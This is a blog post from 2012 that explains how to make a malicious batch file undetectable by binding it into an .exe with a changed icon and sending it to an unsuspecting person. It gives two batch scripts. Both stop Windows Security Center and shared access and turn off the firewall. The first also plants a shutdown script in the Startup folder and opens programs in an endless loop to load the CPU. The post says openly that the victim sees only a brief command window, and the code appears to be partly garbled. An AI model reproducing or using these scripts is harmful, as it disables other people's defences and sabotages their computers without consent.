Thursday, 1 November 2012

How To Make A Batch File Undetectable or Crypter


NBinder pro is a Binder/Converter/IconChanger                       Download 1                Download 2        Torrent dwd    


Download and open.
Click Add..
And add the batch file.
Then you can bind it with self.
By simply clicking Bind.
That will convert the batch to .exe
And then you change the icon.

Com:
Download:
Bat2COM
And convert it.

When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.
But what he doesn’t see is that his firewall,security has closed.

Code:1

@echo off net stop “Security Center” net stop 
SharedAccess netsh firewall set opmode mode=disable 
echo shutdown -s >> "%systemdrive%\documents and 
settings\start menu\programs\startup\virus.bat" :virus
start cmd.exe start command.com start mspaint.exe goto :virus
Save this into notepad with .bat extension. 
your batch file is ready.

What it does ?

  • It will shutdown all security.
  • Makes a new batch file at startup which inside is the command shutdown -s
  • Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.
  • Watch the CPU usage go up.

Code:2

@echo off net stop “Security Center” net stop SharedAccess
netsh firewall set opmode mode=disable
Save this into notepad with .bat extension. 
your batch file is ready
 
What it does ?

  • That will stop the Security Center
  • Shared Access and Firewall.
  • Save the file as something.bat
  • But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.

No comments:

Post a Comment

Receive all updates via Facebook. Just Click the Like Button Below

?